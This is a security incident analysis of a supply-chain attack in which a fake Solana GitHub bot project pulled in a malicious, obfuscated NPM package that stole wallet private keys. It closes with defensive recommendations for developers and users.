Analysis of Solana Users Suffering from Malicious NPM Package Theft of Private Keys

In early July 2025, a Solana user sought help from the security team, stating that their crypto assets were stolen after using an open-source project on GitHub. Investigations revealed that this was an attack incident that exploited a malicious NPM package to steal the user's Private Key.

Event Process

The victim used a GitHub project called solana-pumpfun-bot, which seemed normal and had a high number of Stars and Forks. However, the project's code update timestamps were concentrated around three weeks ago, lacking the characteristics of ongoing updates.

Further analysis reveals that the project relies on a suspicious third-party package called crypto-layout-utils. This package has been removed from the official NPM registry, and the specified version has no historical records. It turns out that the attacker modified the package-lock.json file to point the dependency download link to a GitHub repository they control.

Malicious Packet Analysis

The security team downloaded and analyzed the suspicious crypto-layout-utils-1.3.1 package and found that its code was highly obfuscated. After deobfuscation, it was confirmed to be a malicious NPM package that scans for sensitive files on the user's computer, and if it detects content related to wallets or Private Keys, it uploads them to the attacker's server.

Attack Methods

Attackers may have controlled multiple GitHub accounts to distribute malware and increase project popularity. They disguised themselves as legitimate open-source projects, tricking users into downloading and running Node.js code with malicious dependencies, thereby stealing Private Keys.

In addition, another malicious package bs58-encrypt-utils-1.0.3 was discovered, and it is speculated that the attack activities may have started in mid-June 2025.

Fund Flow

Through on-chain analysis tools, it was found that part of the stolen funds has been transferred to a certain trading platform.

Security Recommendations

1. Be cautious of GitHub projects with unknown sources, especially those involving wallet operations.

2. Run and debug unknown projects in an isolated environment if necessary.

3. Developers should carefully review third-party dependencies and be wary of suspicious packages or download links.

4. Regularly check and update project dependencies, and promptly remove components that pose security risks.

5. Use trusted security tools to regularly scan project code to detect potential threats early.

This incident once again shows that attackers are constantly innovating their methods to target the open-source ecosystem. Developers and users need to enhance their security awareness and work together to maintain a healthy open-source environment.